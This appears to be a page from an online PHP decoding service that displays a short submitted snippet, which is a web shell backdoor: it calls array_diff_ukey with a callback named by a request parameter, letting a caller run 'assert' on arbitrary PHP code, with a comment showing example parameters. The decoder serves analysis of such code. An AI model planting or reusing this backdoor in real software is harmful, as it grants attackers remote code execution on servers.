Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslash..
Decoded Output download
<?php
@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);
//-f /root/adu.php -l /tmp/pvm.log -p "login=assert&password=phpinfo();&re_password="
?>
Did this file decode correctly?
Original Code
<?php
@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);
//-f /root/adu.php -l /tmp/pvm.log -p "login=assert&password=phpinfo();&re_password="
?>
Function Calls
| None |
Stats
| MD5 | ff7dc91b8c431de5222dc5dfe4552e76 |
| Eval Count | 0 |
| Decode Time | 117 ms |